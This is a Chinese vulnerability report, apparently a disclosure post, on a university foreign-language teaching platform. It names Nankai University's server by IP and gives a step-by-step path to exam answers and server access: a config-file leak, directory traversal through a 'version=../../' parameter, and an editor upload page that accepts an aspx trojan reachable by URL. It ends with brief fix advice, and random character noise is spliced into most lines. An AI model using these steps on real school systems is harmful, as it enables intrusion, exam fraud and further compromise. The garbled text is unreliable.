好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
7 l( \! a- R R, Z" D# i$ z7 F+ m! g9 @) M0 I, V, T
详细说明:
( b1 E+ C& X: p3 v4 ^, F3 Q- V1 k : E2 b/ t: a6 d6 G0 t/ r
以南开大学的为例:
9 V+ `: X) ]1 B& _0 a" Yhttp://222.30.60.3/NPELS
9 g: W& X& J0 e0 c1 z! ?NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
% L: Z4 j# C% E7 e. R: }<setting name="Update_CommonSvr_CommonService" serializeAs="String">
6 h: F5 `0 L) j6 l<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
3 {* w( \- C1 u( Z6 O</setting>
S( h$ d% p8 q- `及版本号
v$ D5 n d, E: t; Q$ s v- D<add key="TVersion" value="1, 0, 0, 2187">( F7 s0 Z! ]6 [
</add>; D: d) U9 C3 l; Q
直接访问: `- E2 v8 `. G
http://222.30.60.3/NPELS/CommonService.asmx
+ V$ {9 z& y: E- J: Q% H( _使用GetTestClientFileList操作,直接 HTTP GET 列目录:5 Q: n5 y3 A/ l3 S( O
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187& M# |8 M% L1 x$ q! o5 D: g$ K
进一步列目录(返回的网页很大,可以直接 wget 下来)
/ }2 G& \/ [) I- Dhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
: l- G( p8 {/ Z% E \/ X
% W, V* B1 S. O( ]' G发现
- n5 X- E h7 N+ E8 khttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
; q2 ?- z4 X) m7 ], |/ q可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
( \/ R: ^9 z9 J上传后继续列目录找到木马地址直接访问即可 m: u: Y; ?6 k' X' ^1 U
" a* K, E# x" Q. s6 V- | HOOXX
5 @; c) {2 }" P4 M, {' V9 a ! o' b; D8 K, g+ l% \" X" Y
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法- X# O q8 C: n3 y& h
漏洞证明:
' H/ a* x; o f& `- L w- ? / n+ n1 X5 F- E* f# c Q
列目录:. K: B- S1 [( V$ S0 t9 Y2 d$ j
http://222.30.60.3/NPELS/CommonS ... List?version=../../; |+ q. z. y7 b5 L7 {; P
文件上传:5 u% V2 x3 w$ A6 ]
http://222.30.60.3/npelsv/editor/editor.htm
8 H$ M2 G% z+ M& x0 P8 A2 c( d
/ B7 W+ N/ j! P上传木马:5 u3 j& b3 b6 \. k. P
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx9 h) X: _& \ g2 I$ T! Q. n
- c9 ~: j3 L; w! l G( ^修复方案:
! c- C/ o. c5 S( h j好像考试系统必须使用 CommonService.asmx
: ?- L# I [+ r# o; q最好配置文件加密或者用别的方式不让它泄露出来
1 R+ m' j* F+ s+ ]% x& y, }4 q并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样+ R. X/ I# a3 p: r
|